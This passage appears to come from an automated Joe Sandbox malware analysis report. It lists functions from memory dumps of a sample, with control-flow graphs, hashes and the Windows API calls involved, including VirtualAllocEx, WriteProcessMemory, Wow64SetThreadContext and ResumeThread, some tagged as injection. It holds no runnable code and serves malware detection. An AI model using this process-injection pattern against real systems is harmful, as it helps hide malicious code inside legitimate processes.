                                                              • Instruction Fuzzy Hash: 3A717974A00B058FEB25CFA9D48479BBBF5FF88200F10892ED44ADBA91D774E945CB90
                                                              Function 015044B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 172 15044b4-15059b9 CreateActCtxA 175 15059c2-1505a1c 172->175 176 15059bb-15059c1 172->176 183 1505a2b-1505a2f 175->183 184 1505a1e-1505a21 175->184 176->175 185 1505a40 183->185 186 1505a31-1505a3d 183->186 184->183 188 1505a41 185->188 186->185 188->188
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 015059A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 318c98eade73734715e8d39dca495a3c4533afbaae50b42ae6b3d37dfcdd8ad7
                                                              • Instruction ID: f30b86fa1b8078a538e9930bb7245248f46a27045d46700d2d4e97b1d36bb294
                                                              • Opcode Fuzzy Hash: 318c98eade73734715e8d39dca495a3c4533afbaae50b42ae6b3d37dfcdd8ad7
                                                              • Instruction Fuzzy Hash: AB41D270C1071DCBEB25CFA9C884B8EBBF5BF49304F20806AD408AB251DBB56945CF90
                                                              Function 015058ED Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 189 15058ed-15059b9 CreateActCtxA 191 15059c2-1505a1c 189->191 192 15059bb-15059c1 189->192 199 1505a2b-1505a2f 191->199 200 1505a1e-1505a21 191->200 192->191 201 1505a40 199->201 202 1505a31-1505a3d 199->202 200->199 204 1505a41 201->204 202->201 204->204
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 015059A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: c9ddbbec59818022534b74cf4d665c0587aa9aa5d1074d8c1ca5ebcbc7cbe7c2
                                                              • Instruction ID: 23068a0311f416cdfe539bdd0935a94684a65797382ef1d234c48213529f4eea
                                                              • Opcode Fuzzy Hash: c9ddbbec59818022534b74cf4d665c0587aa9aa5d1074d8c1ca5ebcbc7cbe7c2
                                                              • Instruction Fuzzy Hash: 8B41CF71C10719CFEB25CFA9C884B8EBBF5BF89304F60816AD408AB291DBB56945CF50
                                                              Function 07946DE0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 205 7946de0-7946e36 208 7946e46-7946e85 WriteProcessMemory 205->208 209 7946e38-7946e44 205->209 211 7946e87-7946e8d 208->211 212 7946e8e-7946ebe 208->212 209->208 211->212
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07946E78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: cd1693ba175d81c66c73bf26d28eba0e5220fc600898b43bf46a9f0260533883
                                                              • Instruction ID: 6663e8fd1e060c8b5f15ac0e2fed93d373822ecd9fa369d81d19857fd0e1865d
                                                              • Opcode Fuzzy Hash: cd1693ba175d81c66c73bf26d28eba0e5220fc600898b43bf46a9f0260533883
                                                              • Instruction Fuzzy Hash: A42177B6900309DFDB10CFAAC881BDEBBF4FF48310F108429E918A7240C7799911DBA4
                                                              Function 07946DE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 216 7946de8-7946e36 218 7946e46-7946e85 WriteProcessMemory 216->218 219 7946e38-7946e44 216->219 221 7946e87-7946e8d 218->221 222 7946e8e-7946ebe 218->222 219->218 221->222
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07946E78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 459378b1e0d367bc586e58a5cde883de54cb7eaf7e9628d4f24770f8c0108982
                                                              • Instruction ID: c65249fb01f674a49e25a22a9de15b8bae048519f513f1715fe1fe7ead191d72
                                                              • Opcode Fuzzy Hash: 459378b1e0d367bc586e58a5cde883de54cb7eaf7e9628d4f24770f8c0108982
                                                              • Instruction Fuzzy Hash: AA2166B6900309DFDB10CFAAC880BDEBBF5FF48310F10842AE918A7240C7799950CBA4
                                                              Function 07946ED0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 237 7946ed0-7946f65 ReadProcessMemory 241 7946f67-7946f6d 237->241 242 7946f6e-7946f9e 237->242 241->242
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07946F58
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 2c7e8b4e80c22077cb5dbece3e03c560c0e8715aabb0ceaacb3d46668eae66f9
                                                              • Instruction ID: f5bbe70bc6cdccc66331a811b0851327fe7ccc0b7c5a9b41cd2c7611829134bc
                                                              • Opcode Fuzzy Hash: 2c7e8b4e80c22077cb5dbece3e03c560c0e8715aabb0ceaacb3d46668eae66f9
                                                              • Instruction Fuzzy Hash: E12134B28003599FDB10DFAAC881BEEFBF5FF48310F14842AE518A7240C7799915DBA0
                                                              Function 07946C49 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 226 7946c49-7946c9b 229 7946c9d-7946ca9 226->229 230 7946cab-7946cdb Wow64SetThreadContext 226->230 229->230 232 7946ce4-7946d14 230->232 233 7946cdd-7946ce3 230->233 233->232
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07946CCE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 05a43f375a67a75170a0eb9c660eeda60999be3040c80e063089adb743ab19a7
                                                              • Instruction ID: f63fc68e0883095410a7c8c81b462df1c31143c804b765efd913be2f2dc84de2
                                                              • Opcode Fuzzy Hash: 05a43f375a67a75170a0eb9c660eeda60999be3040c80e063089adb743ab19a7
                                                              • Instruction Fuzzy Hash: A12149B19003099FDB14DFAAC885BEEBBF4EF48314F14842AD519A7340C778A945CFA5
                                                              Function 0150CC40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 246 150cc40-150d634 DuplicateHandle 248 150d636-150d63c 246->248 249 150d63d-150d65a 246->249 248->249
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0150D566,?,?,?,?,?), ref: 0150D627
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: bfa055d6f0907b9b496305f240ec9d5e1723637aadc7d77be0f00dd5da7b075f
                                                              • Instruction ID: 38c0f82aa162d6be7fb8e2c47cd00d460596cc1c2c116c7ca36da21003394c0c
                                                              • Opcode Fuzzy Hash: bfa055d6f0907b9b496305f240ec9d5e1723637aadc7d77be0f00dd5da7b075f
                                                              • Instruction Fuzzy Hash: 6B21B5B5900249DFDB10CFDAD884ADEBBF8FB48310F14841AE918A7350D375A954CFA5
                                                              Function 07946ED8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 262 7946ed8-7946f65 ReadProcessMemory 265 7946f67-7946f6d 262->265 266 7946f6e-7946f9e 262->266 265->266
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07946F58
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 32b80a3147790de4a20b51805052c19949288ef466baa2e14dfb54441a6da435
                                                              • Instruction ID: f6d8ef05023cd88408408d1f5b2eeab8dd26bbd4dfdb42a23192d8f3f4fae3c3
                                                              • Opcode Fuzzy Hash: 32b80a3147790de4a20b51805052c19949288ef466baa2e14dfb54441a6da435
                                                              • Instruction Fuzzy Hash: 392125B18003499FDB10CFAAC881BEEFBF5FF48310F14842AE518A7240C7799911CBA1
                                                              Function 07946C50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 252 7946c50-7946c9b 254 7946c9d-7946ca9 252->254 255 7946cab-7946cdb Wow64SetThreadContext 252->255 254->255 257 7946ce4-7946d14 255->257 258 7946cdd-7946ce3 255->258 258->257
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07946CCE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 00036dd73033a117d92cdfc36080b70b58f884638e3447ffc3277aab2c445fa1
                                                              • Instruction ID: b6b8c7f8818697c99aaa90375adee708baebe661d7860c58b6d5f5f6e2097341
                                                              • Opcode Fuzzy Hash: 00036dd73033a117d92cdfc36080b70b58f884638e3447ffc3277aab2c445fa1
                                                              • Instruction Fuzzy Hash: 802149B19003099FDB10CFAAC485BEEBBF4EF48314F14842AD519A7240C7789945CFA5
                                                              Function 0150D599 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 270 150d599-150d634 DuplicateHandle 271 150d636-150d63c 270->271 272 150d63d-150d65a 270->272 271->272
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0150D566,?,?,?,?,?), ref: 0150D627
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: a721cde92bb34d06597c459c6f6fb6b6085dc8d2e9f86ad50aabd8ecba01b93d
                                                              • Instruction ID: 0b34a06ff80e412c9d36d629de6cd70505e1987af68e36c13b31bf3c9e2214ce
                                                              • Opcode Fuzzy Hash: a721cde92bb34d06597c459c6f6fb6b6085dc8d2e9f86ad50aabd8ecba01b93d
                                                              • Instruction Fuzzy Hash: 1821B3B5900249DFDB11CFEAD984ADEBBF4BB48310F14841AE918A7350D374A954CF65
                                                              Function 07946D20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 275 7946d20-7946da3 VirtualAllocEx 278 7946da5-7946dab 275->278 279 7946dac-7946dd1 275->279 278->279
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07946D96
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 1d79407096dd151013850bf9244a9c21f3de95f8dc6eb7bb9363b44e6650732f
                                                              • Instruction ID: 40a459c7e308f3e0b507de7c0b9f68794c3f22288296929191432aae37e2adbc
                                                              • Opcode Fuzzy Hash: 1d79407096dd151013850bf9244a9c21f3de95f8dc6eb7bb9363b44e6650732f
                                                              • Instruction Fuzzy Hash: F71156B6900249DFDF10DFAAC844BDFBBF5AF89320F148819E419A7250C776A551CFA0
                                                              Function 07946D28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 283 7946d28-7946da3 VirtualAllocEx 286 7946da5-7946dab 283->286 287 7946dac-7946dd1 283->287 286->287
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07946D96
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 2e913cb26094d7eff88c6c4f5304b96bf5ee830691a990cb3d753da2072e03c3
                                                              • Instruction ID: 19041a729dd86efc469ced41bac87eb4932c2b23dd4854e26e9e59eee94d7e15
                                                              • Opcode Fuzzy Hash: 2e913cb26094d7eff88c6c4f5304b96bf5ee830691a990cb3d753da2072e03c3
                                                              • Instruction Fuzzy Hash: AA1126B68003499FDB10DFAAC844BDFBBF9AF89320F148819E519A7250C776A550CFA1
                                                              Function 07946791 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 0cb635f7ca38f9676ce5991fe06c7a448889e42ed6b543ed3737975d763db2d8
                                                              • Instruction ID: b59a394dc82af2d310bff7115afe48c91b62a99d7037d78a89eb9fa3b4ceb677
                                                              • Opcode Fuzzy Hash: 0cb635f7ca38f9676ce5991fe06c7a448889e42ed6b543ed3737975d763db2d8
                                                              • Instruction Fuzzy Hash: B0115BB19003498FDB14DFAAC845BDFFBF4EB48314F148819D419A7340C779A501CB94
                                                              Function 07946798 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 506e1a4d206ef37a0fa1ad80438cdcfe0c36434d1647c86129101a5a503f4d40
                                                              • Instruction ID: b203c16284c1650562cd87ae98e54911ea5d4a4406b30dd3abd5202265a0227c
                                                              • Opcode Fuzzy Hash: 506e1a4d206ef37a0fa1ad80438cdcfe0c36434d1647c86129101a5a503f4d40
                                                              • Instruction Fuzzy Hash: 18113AB5900349CFDB24DFAAC845BDFFBF8AB88714F148819D419A7340CB756541CBA5
                                                              Function 079468D4 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0794AF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: f452bad44b0c52c42a021f8553893360c8eb270624cb7929f4daab66ef9e041e
                                                              • Instruction ID: 99c70638d7a20b6ac4832b1802ba9946df50d24be2a2ef4dd592886cb6b8dfaf
                                                              • Opcode Fuzzy Hash: f452bad44b0c52c42a021f8553893360c8eb270624cb7929f4daab66ef9e041e
                                                              • Instruction Fuzzy Hash: 6A11F5B5804349DFDB20CF9AC885BEEFBF8EB58314F10845AE518A7210C375A544CFA1
                                                              Function 0794AEE0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0794AF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 5250d6dac5a9c3745a71480972e5454635a790aab5e37ffaa5b6fe353ac7b6b6
                                                              • Instruction ID: 57ca25979167fc78427877a0e145b7fe944212dc9d4e4855c32a7cd3e3663e0e
                                                              • Opcode Fuzzy Hash: 5250d6dac5a9c3745a71480972e5454635a790aab5e37ffaa5b6fe353ac7b6b6
                                                              • Instruction Fuzzy Hash: 041103B5800749DFDB20CF9AD845BDEBBF8EB48324F10845AE518A7240C375A544CFA1
                                                              Function 0794693C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0794AF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 667b4f4c22b545d0afda3351ca120f8fecad6808fe87c1653a7c911d2fedb959
                                                              • Instruction ID: 53c4130f22495e1557d46527bf5ec72518f1d2c145e3a07632d393f878e120a3
                                                              • Opcode Fuzzy Hash: 667b4f4c22b545d0afda3351ca120f8fecad6808fe87c1653a7c911d2fedb959
                                                              • Instruction Fuzzy Hash: 6C11F2B5800749DFDB20CF9AD885BDEBBF8EB58314F10845AE518A7201D3B5A944CFA1
                                                              Function 0150B2C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0150B326
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 883801135ebf5dd29b85a620f9b3cd06133545575c3261c350a353ff9b20a40e
                                                              • Instruction ID: 88a1606e871c38e81c98b5ecc451a49dbd5623b540a2b36254a3de85d875022a
                                                              • Opcode Fuzzy Hash: 883801135ebf5dd29b85a620f9b3cd06133545575c3261c350a353ff9b20a40e
                                                              • Instruction Fuzzy Hash: 2C110FBAC007498FDB24CF9AD444ADEFBF4AF88210F20841AD828A7240C375A545CFA1
                                                              Function 0794683F Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: a73c79ae161e63d86b625fcede03576e9a6a826cbb332a43a91b6c789ced1961
                                                              • Instruction ID: b554b0936c12a21d12a39b2899a5b7b5650180f1a443ea648382ecc2c71befd9
                                                              • Opcode Fuzzy Hash: a73c79ae161e63d86b625fcede03576e9a6a826cbb332a43a91b6c789ced1961
                                                              • Instruction Fuzzy Hash: 22F059B2504386CFD721EB79C8047CEFFE0EF42214F28888EC08A97A42CA3E4006C752
                                                              Function 014AD4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d21f1b51f4f5ccc4da6be2c9361329f893d805f6a0e13536ffc4cda76b47c1ea
                                                              • Instruction ID: 4a72b435af6c646d00fcdae2ed397f84ffa80b4cab03f8e465cc8995a8c64748
                                                              • Opcode Fuzzy Hash: d21f1b51f4f5ccc4da6be2c9361329f893d805f6a0e13536ffc4cda76b47c1ea
                                                              • Instruction Fuzzy Hash: 522148B1900244EFDB05DF54D8C0B27BF61FB98318F64C56AE8450B666C336D406CBA2
                                                              Function 014AD3D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c7383a5109da6d0bd762d61a7a31909640eca6d6a7d1cc46dfa89eef9531e32
                                                              • Instruction ID: 9647fa2dd5815b0b35c01a5c0a34fb989e41b0257f86b1fdb108d7550c637857
                                                              • Opcode Fuzzy Hash: 2c7383a5109da6d0bd762d61a7a31909640eca6d6a7d1cc46dfa89eef9531e32
                                                              • Instruction Fuzzy Hash: F02136B1900304DFDB05DF94D9C0B56BB65FBA8314F61C17AE8090F666C336E446CAA2
                                                              Function 014BD01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1529571127.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_14bd000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b54c590a894b9508c9f33d62a3e4c976cd11c69046c58bc03ae4724133b5d41
                                                              • Instruction ID: 9623065366f52532696816d5d7686a330a8ff3935855bf606cab4bca933ffc0d
                                                              • Opcode Fuzzy Hash: 4b54c590a894b9508c9f33d62a3e4c976cd11c69046c58bc03ae4724133b5d41
                                                              • Instruction Fuzzy Hash: 2F2103B1904204DFDB15DFA8D8C0B16BB61FB8421CF24C5AAD80A0B366C336D407CA72
                                                              Function 014BD006 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1529571127.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_14bd000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84fe936822340506838fca378d770fe3ccce3559fda52b0414bf495ce5a29e6a
                                                              • Instruction ID: 93b56e9af0c4fc084e6d7913a3d44d60552a03a2923b5e2d595d6ef20dd8337e
                                                              • Opcode Fuzzy Hash: 84fe936822340506838fca378d770fe3ccce3559fda52b0414bf495ce5a29e6a
                                                              • Instruction Fuzzy Hash: A4217F755093809FCB02CF24D9D0716BF71EB46218F28C5DAD8498F6A7C33A980ACB62
                                                              Function 014AD3D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                              • Instruction ID: ec94804cf8a338e17cf59049f6ccdf97df51370c3f070623a376436dcf391996
                                                              • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                              • Instruction Fuzzy Hash: 7911DFB6804240DFDB02CF44D9C4B56BF71FB94324F24C2AAD8090B667C33AE456CBA2
                                                              Function 014AD4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                              • Instruction ID: 7c452071504bbe8cfc66a6f913cce3876023d4aaa365b7208db64878f7d33be1
                                                              • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                              • Instruction Fuzzy Hash: AF11E172804280DFCB02CF54D9C4B16BF71FB94318F24C6AAD8490B667C336D456CBA2
                                                              Function 014AD731 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39019ca40c214ae6a8e0b3c2b79fd4d40143d82523c6d218cd3a7cbe00f2b711
                                                              • Instruction ID: 520df37557a06cccb1e364cb758f2f3f063bd90879bb55a9cb1de838cb8f6fb6
                                                              • Opcode Fuzzy Hash: 39019ca40c214ae6a8e0b3c2b79fd4d40143d82523c6d218cd3a7cbe00f2b711
